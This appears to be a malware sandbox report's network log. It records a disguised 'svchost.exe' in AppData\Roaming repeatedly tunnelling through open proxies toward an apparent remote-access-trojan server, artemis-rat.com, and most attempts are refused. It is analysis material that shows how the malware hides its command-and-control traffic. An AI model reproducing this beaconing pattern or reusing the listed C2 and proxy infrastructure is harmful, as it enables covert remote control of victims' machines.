                                                                                    Mar 9, 2024 13:14:34.406374931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.560796022 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3179192.168.2.558763147.124.212.311327643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.413062096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3180192.168.2.560099103.109.59.209108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.413357973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3181192.168.2.560153185.110.190.998043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.415365934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3182192.168.2.559796199.58.185.9414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.417327881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3183192.168.2.55990969.167.169.461290343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.417714119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3184192.168.2.55885351.75.126.1502180343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.467216015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.646223068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3185192.168.2.560271104.16.106.1548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.498074055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.652405977 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3186192.168.2.55882845.11.95.166601643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.522089958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.120294094 CET39INHTTP/1.0 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3187192.168.2.56031397.74.233.2064059143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.522404909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.020266056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.677407980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.761177063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3188192.168.2.56015894.130.94.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.535161972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3189192.168.2.56015643.133.136.208880043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.542807102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3190192.168.2.559963192.163.202.883978243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.542859077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.145730019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646456957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.646220922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.442964077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3191192.168.2.558815103.158.253.105108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.544338942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192192.168.2.56027238.162.23.127312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.547305107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.029032946 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3193192.168.2.558706103.75.96.70808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.548815966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3194192.168.2.560051180.250.159.49415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.549079895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.833528042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3195192.168.2.559938162.241.66.1355153543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.551374912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3196192.168.2.56027694.131.60.1995837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.551585913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.773355961 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3197192.168.2.555305162.241.158.2045298043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.555349112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.145998955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3198192.168.2.559956162.214.191.595827543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.564816952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3199192.168.2.56015543.231.22.2288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.571130991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.985397100 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3200192.168.2.560300198.37.57.1128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.572832108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.808705091 CET503INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 324
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3201192.168.2.555341198.49.68.808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.592269897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.546871901 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 663
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
